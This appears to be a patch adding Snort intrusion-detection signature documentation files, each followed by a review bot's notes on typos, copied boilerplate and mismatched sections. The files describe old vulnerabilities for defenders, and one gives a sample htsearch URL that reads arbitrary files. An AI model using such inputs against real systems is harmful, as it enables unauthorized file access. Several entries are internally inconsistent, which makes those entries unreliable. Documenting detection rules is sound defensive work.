+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
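Review bot: as in 100000448.txt, the blank line before "--" is missing after the Sid "100000516", after Affected Systems and after Contributors. The Impact paragraph claims "system integrity compromise" and "execution of arbitrary code" for a cross site scripting issue in the "mainpath" parameter of "footer.php"; the realistic impact is what Attack Scenarios describes, information stolen from a user who follows a crafted link, so Impact should be scaled back to that. "attackers choosing" needs an apostrophe.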
--- /dev/null
+++ b/doc/signatures/2032.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2032
+
+--
+Summary:
+The rpc.ypasswd service is used to update user information remotely. 
+This service should not be available outside the local area network, 
+external source.
+
+--
+Impact:
+This may be an intelligence gathering activity on available rpc services
+on a machine connected to external resources. The possibility also 
+exists that an attacker may already have gained access to a NIS server 
+and thus all resources connected to that host.
+
+--
+Detailed Information:
+A vulnerability exists in some versions of the rpc.ypasswd service that
+can lead to a remote root compromise of a vulnerable host. This activity
+may be an intelligence gathering exercise to ascertain wether or not the
+host is vulnerable to this attack.
+
+This activity may also indicate a possible compromise of a NIS server 
+via a legitimate user account the attacker has previously garnered. 
+Compromise of a master NIS server may present the attacker with easy 
+access to all NIS resources the machine is connected to.
+
+--
+Affected Systems:
+All systems running the rpc.ypasswd service.
+
+--
+Attack Scenarios:
+The attacker can make a request to update user information via 
+rpc.ypasswd.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the rpc.ypasswd daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+SANS:
+http://www.sans.org/rr/unix/NIS.php
+http://www.sans.org/rr/unix/sec_solaris.php
+
+--
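Review bot: the Summary sentence "This service should not be available outside the local area network, external source." is broken; a clause appears to have been lost between "network" and "external source". The Summary also never says what triggers the event, unlike the "This event is generated when ..." opening used by the other files; state the request the rule matches (Attack Scenarios describes a request to update user information via rpc.ypasswd). "wether" in Detailed Information should be "whether".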
--- /dev/null
+++ b/doc/signatures/100000170.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+100000170
+
+-- 
+Summary: 
+This event is generated when an overly long Host: parameter is sent in an HTTP 
+request, which will cause a buffer overflow to occur in the GFI MailSecurity 
+for Exchange/SMTP web interface.
+
+--
+Impact:
+A denial of service will occur in the vulnerable application, and remote code 
+may be executed with the priviliges of the user running the application.
+
+--
+Detailed Information:
+GFI MailSecurity for Exchange/SMTP is an anti-virus program that integrates 
+with Microsoft Exchange servers. Its web interface is vulnerable to a buffer 
+overflow attack, which may be triggered by sending a Host: parameter of 100 or 
+more bytes in an HTTP request. Vulnerable versions of the application will 
+crash, and code may be executed with the priviliges of the user running the 
+program.
+
+--
+Affected Systems:
+GFI MailSecurity for Exchange/SMTP 8.1
+
+--
+Attack Scenarios:
+Attackers will likley exploit this with a script.
+
+--
+Ease of Attack:
+Simple, as no authentication is required, and HTTP is a well-documented 
+protocol, which allows for easy creation of malicious packets.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Download and apply the patch referenced below.
+
+--
+Contributors:
+rmkml
+Sourcefire Research Team
+
+--
+Additional References
+ftp://ftp.gfi.com/patches/MSEC8_PATCH_20050919_01.zip
+
+--
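Review bot: "priviliges" appears twice (Impact and Detailed Information) and should be "privileges"; "likley" in Attack Scenarios should be "likely". The "Additional References" heading lacks the colon every other file uses, which matters if these files are parsed by section name. The only reference is a direct ftp link to a patch archive; since Corrective Action says "Download and apply the patch referenced below", a link to the vendor's advisory or patch page would be a more durable reference than the zip file itself. The contributor "rmkml" is listed without the email address used for the same contributor in 100000175.txt.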
--- /dev/null
+++ b/doc/signatures/2006.txt
@@ -0,0 +1,90 @@
+Rule:
+
+--
+Sid:
+2006
+
+--
+Summary:
+KCMS (Kodak Color Management System) is an RPC (Remote Procedure Call)
+service for Sun Solaris operating systems. It is able to read profiles
+stored on remote machines. It is possible for an attacker to bypass
+directory traversal checks and read any file on the remote system.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources on the machine not limited to user accounts
+and business data.
+
+--
+Detailed Information:
+The attacker first needs to create a directory under
+/etc/openwin/devdata/profiles or /usr/openwin/etc/devdata/profiles,
+using the ToolTalk database server is one method of creating a
+directory. Once this has been achieved, the attacker is then able to
+perform the directory traversal.
+
+The directory traversal allows the attacker to read any file on the
+compromised system. Once a sensitive system file such as the system
+password database has been retrieved, the attacker may use other tools
+at his leisure to discover username and password information. This may
+lead to further system compromise.
+
+The KCMS daemon runs with root privileges and is typically started on
+boot via inetd. The ToolTalk database server is also commonly installed
+and started in this manner. The KCMS daemon usually listens on TCP port
+32871 although this can vary.
+
+--
+Affected Systems:
+	Sun Microsystems Solaris 2.5.1 (Sparc/Intel)
+	Sun Microsystems Solaris 2.6 (Sparc/Intel)
+	Sun Microsystems Solaris 7 (Sparc/Intel)
+	Sun Microsystems Solaris 8 (Sparc/Intel)
+	Sun Microsystems Solaris 9 (Sparc/Intel)
+
+--
+Attack Scenarios:
+The ToolTalk database server procedure TT_ISBUILD can be used to create
+a directory named TT_DB anywhere on a remote system. Creation of this
+directory then allows the attacker to use directory traversal to further
+compromise the machine.
+
+--
+Ease of Attack:
+Once the directory has been created, further compromise is simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the KCMS daemon in the file /etc/inetd.conf. Kill any running
+KCMS processes and restart the inet daemon.
+
+Configure your firewall to restrict external access to the TCP and UDP
+port 111 used by the RPC port mapper service and the range used by RPC
+services, typically 32700 to 34000.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/850785
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0027
+
+--
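Review bot: the CVE reference uses the legacy candidate prefix ("name=CAN-2003-0027"); MITRE's "CAN-" numbers were renamed to "CVE-" once accepted, so this link should be checked and updated to the CVE- form if the entry was promoted. Minor style: "None Known" is capitalised differently from the "None known." used in most other files, and the "Affected Systems" entries are tab-indented while other files use plain lines.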
--- /dev/null
+++ b/doc/signatures/2373.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2373
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with Mollensoft Hyperion FTP/Encladus Server Suite XMKD 
+command. 
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+CesarFTPD offers FTP servers for Windows hosts. A vulnerability exists 
+with the XMKD command that can cause a buffer overflow and permit the 
+execution of arbitrary commands with system privileges. The buffer 
+overflow can be caused by supplying an overly long argument to the XMKD 
+command.
+
+--
+Affected Systems:
+	Mollensoft Software Enceladus Server Suite 3.9.11
+	Mollensoft Software Hyperion FTP Server 3.5.2
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the XMKD 
+command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
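Review bot: the product is named inconsistently across this file. Summary says "Mollensoft Hyperion FTP/Encladus Server Suite" (misspelling "Enceladus" as given in Affected Systems), while Detailed Information opens with "CesarFTPD offers FTP servers for Windows hosts", which is a different product entirely and looks like leftover text from another signature. Detailed Information should name the Mollensoft products, and Additional References is empty for a vulnerability that Affected Systems ties to specific versions.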
--- /dev/null
+++ b/doc/signatures/2354.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2354
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application IdeaBox.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+IdeaBox contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable gorumDir when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in the file notification.php.
+
+--
+Affected Systems:
+	PHPOutsourcing IdeaBox 1.0
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the gorumDir variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
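Review bot: the claim in Detailed Information that the webserver user is "usually root" should be qualified or dropped; production web servers normally run as an unprivileged account, and overstating the privilege level misleads anyone triaging the event. Same paragraph has doubled spaces in "GET or POST  request  to", and Additional References is empty.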
--- /dev/null
+++ b/doc/signatures/3302.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3302
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
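Review bot: Attack Scenarios does not match the rest of the file. It describes "a request for a file with an overly long filename via a network share", whereas Summary and Detailed Information describe malformed data sent to the RPC DCOM interface; the scenario text appears copied from a different signature and should describe a malformed RPC request. Also "Expoit" in Ease of Attack should read "Exploit", and Additional References is empty.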
--- /dev/null
+++ b/doc/signatures/1045.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1045
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
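Review bot: this document never says what the rule actually matches. Summary, Detailed Information and Attack Scenarios all speak of a "potential weakness" and "a sensitive file" without naming the file or request, so an analyst cannot tell from the doc what a hit means or how to verify it; the specific request should be stated. Style: "Sid: 1045" is on one line while the other files put the number on its own line, and Impact reads "Information gathering possible administrator access." which needs a comma or conjunction.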
--- /dev/null
+++ b/doc/signatures/585.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+585
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) sadmind is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port sadmind is using.  Attackers can also learn what versions of the sadmind protocol are accepted by sadmind.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as sadmind run.  The sadmind RPC service is used by Solaris hosts to remotely perform distributed system administration tasks such as adding new users.  There is a vulnerability associated with sadmind that may cause a buffer overflow, allowing an attacker to execute abitrary code with the privileges of sadmind, possibly root. 
+
+--
+Affected Systems:
+Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6, and 7. 
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where sadmind runs.  This may be a precursor to an attack to exploit the sadmind buffer overflow.
+
+--
+Ease of Attack:
+Simple.  Exploit scripts are freely available. A worm was observed in 2001 that used the sadmind exploit (and an IIS vulnerability) to compromise systems and deface web pages. 
+
+--
+False Positives:
+If a legitimate remote user is allowed to access sadmind, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for sadmind, not probes of the sadmind service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the sadmind service itself. An attacker may attempt to go directly to the sadmind port without querying the portmapper service which, would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Original rule modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/866
+
+CERT:
+http://www.cert.org/advisories/CA-1999-16.html
+
+Arachnids:
+http://www.whitehats.com/info/IDS20
+
+
+--
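Review bot: spelling and punctuation only: "abitrary" in "execute abitrary code" should be "arbitrary", and the False Negatives sentence "without querying the portmapper service which, would not trigger the rule" has the comma on the wrong side of "which". The False Negatives section itself is a good model for the other files in this patch, which mostly say "None known".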
--- /dev/null
+++ b/doc/signatures/2163.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2163
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
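Review bot: Detailed Information says the rule fires on "a filename extension commonly used by viruses" but never says which extension, so the reader cannot judge the false-positive note or tune the rule; name the extension the rule matches. Grammar in Impact: "An virus on an infected host may be attempting to propogate." should read "A virus ... propagate".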
--- /dev/null
+++ b/doc/signatures/100000329.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000329
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Invision Power Board" application running on a webserver. Access to the file "class_post.php" using a remote file being passed as the "post_icon" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "post_icon" parameter in the "class_post.php" script used by the "Invision Power Board" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Invision Power Board
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
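Review bot: the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application ... validating the credentials of a client host") and the Attack Scenarios text about supplying "his/her own credentials" describe an authentication-bypass rule, not the remote file include via "post_icon" that the Summary describes; both should be replaced with text about a remote URL being supplied in that parameter. Also the file starts with two blank lines before "Rule:", unlike the others in this patch.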
--- /dev/null
+++ b/doc/signatures/2167.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2167
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
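Review bot: this file is word-for-word identical to the sid 2163 document apart from the Sid number, so the two rules are indistinguishable from their documentation; each should name the filename extension it matches. Same grammar fixes apply: "An virus" and "propogate" in Impact.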
--- /dev/null
+++ b/doc/signatures/100000561.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000561
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "dotProject" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "login" parameter in the "ui.class.php" script 
+used by the "dotProject" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using dotProject
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
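Review bot: the Impact section is boilerplate that does not fit a cross site scripting rule; "system integrity compromise", "administrative access to the server" and "execution of arbitrary code" are server-side outcomes, whereas the Attack Scenarios text correctly describes a malicious link that steals information from the user who clicks it. Impact should describe client-side script execution in the victim's browser (session or credential theft). Formatting: the "--" separators after the Sid, Affected Systems and Contributors sections lack the preceding blank line used elsewhere.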
--- /dev/null
+++ b/doc/signatures/2874.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2874
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_raw
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
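Review bot: the sentence in Detailed Information is broken across lines, "vulnerability in the procedure alter_priority_raw" then ". This procedure is included in" on the next line, which looks like a template expansion that left a stray line break before the full stop; join it into one sentence. Affected Systems reads "Oracle Oracle9i" (duplicated vendor name), and several separator lines are "-- " with trailing whitespace rather than "--".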
--- /dev/null
+++ b/doc/signatures/1602.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+1602
+
+--
+Summary:
+This event is generated when an attempt is made to access htsearch.
+
+--
+Impact:
+Severe. Unauthorized file access is possible.
+
+--
+Detailed Information:
+Some versions of htdig allow inclusions to be made from configuration files as a parameter to the htsearch function. Any file can be included by enclosing it in single quotes ('foo').
+
+Using this vulnerability, any single quoted input string (`....`) is included as an index file by htsearch. This allows an attacker to read any file on the host.
+
+This event is generated when an attempt is made to access the cgi script htsearch. Refer to the rules with sid 1600 and 1601 for tracking actual exploit attempts.
+
+--
+Affected Systems:
+HTDig versions 3.1.1, 3.1.2, 3.1.3, 3.1.4 and 3.2.0b1
+
+--
+Attack Scenarios:
+A input form with a textbox named "Exclude" and http post action handled by htsearch or a url similar to http://www.foo.com/cgi-bin/htsearch?Exclude=%60/anyfile%60 can be used to access files on your host. %60 is the single quote caracter "`".
+
+--
+Ease of Attack:
+Simple. No exploit scripts required
+
+--
+False Positives:
+If htdig is used as a search engine for a website, this rule will generate an event for each request for htsearch.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Related Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+
+-- 
+Additional References:
+Bugtraq:
+http://www.securityfocus.com/bid/1026
+
+--
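Review bot: the quoting character is described inconsistently. Detailed Information says files are included by enclosing them "in single quotes ('foo')", but the next paragraph shows backticks ("`....`") and Attack Scenarios says "%60 is the single quote caracter "`""; %60 is the backtick (grave accent), not the single quote (which is %27). The text should consistently say backtick, and "caracter" should be "character". Grammar: "A input form" should be "An input form".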
--- /dev/null
+++ b/doc/signatures/2346.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+2346
+
+--
+Summary:
+This event is generated when an attempt is made to access the
+chatheader.php script which contains known vulnerabilities and
+is part of  the myPHPNuke web application running on a server.
+
+--
+Impact:
+Information gathering and possible cross site scripting attack.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the myPHPNuke web application running on a server.
+Multiple vulnerabilities exist in the application which can lead to
+cross site scripting attacks.
+
+--
+Affected Systems:
+	myPHPNuke 1.8.8
+
+--
+Attack Scenarios:
+An attacker can supply code of their choice by including it in the
+Default_Theme parameter of the chatheader.php script.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
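Review bot: Attack Scenarios says an attacker can "supply code of their choice by including it in the Default_Theme parameter", which reads like a file inclusion, while Impact and Detailed Information describe cross site scripting; clarify which it is so the Impact statement matches. Minor: doubled space in "part of  the myPHPNuke", and Additional References is empty although a specific version is listed.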
--- /dev/null
+++ b/doc/signatures/694.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
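Review bot: the Sid field is empty even though the file is named 694.txt; the number should be filled in. The sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell" is leftover text from a telnet rule and has nothing to do with SQL commands. Attack Scenarios ("Simple. These are SQL database commands.") answers the Ease of Attack question instead of describing a scenario, and the document never says which SQL command the rule matches, which the False Positives note about administrators needs in order to be useful.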
--- /dev/null
+++ b/doc/signatures/2272.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2272
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Coreutils LS.
+
+--
+Impact:
+Denial of Service, possible arbitrary code execution.
+
+--
+Detailed Information:
+The Coreutils ls command contains an integer overflow vulnerability
+which may present an attacker with an exploitation opportunity in
+software that uses this command. By supplying a large amount of data to
+the ls command in the form of the width variable, an attacker may cause
+a DoS to occur. It may also be possible to execute arbitrary code as the
+application becomes unstable.
+
+--
+Affected Systems:
+	Coreutils LS
+
+--
+Attack Scenarios:
+The attacker needs to supply a large amount of data in the width
+variable to the ls command.
+
+--
+Ease of Attack:
+Simple. No exploit software required although automated scripts do exist.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
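Review bot: Detailed Information says the overflow is triggered "in the form of the width variable" in "software that uses this command" but never says how a remote attacker gets that value to ls, which is what the signature must be matching on; the doc should name the service or protocol through which the width argument is passed. Style: the command is "ls" (lowercase), not "LS", and Affected Systems gives no version while Additional References is empty.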
--- /dev/null
+++ b/doc/signatures/286.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+286
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in the POP3 qpopper service on BSD systems.
+
+--
+Impact:
+An attacker can gain access to a shell running with root privileges.
+
+--
+Detailed Information:
+This rule looks for a piece of shell code (executable code) that is
+used to exploit a known vulnerability in an older version of the Qualcom
+based POP3 daemon distributed with BSD Unixes.
+
+--
+Affected Systems:
+*BSD systems using Qualcomm Qpopper 2.4
+
+--
+Attack Scenarios:
+The attack is done remotely and gives the attacker a command shell
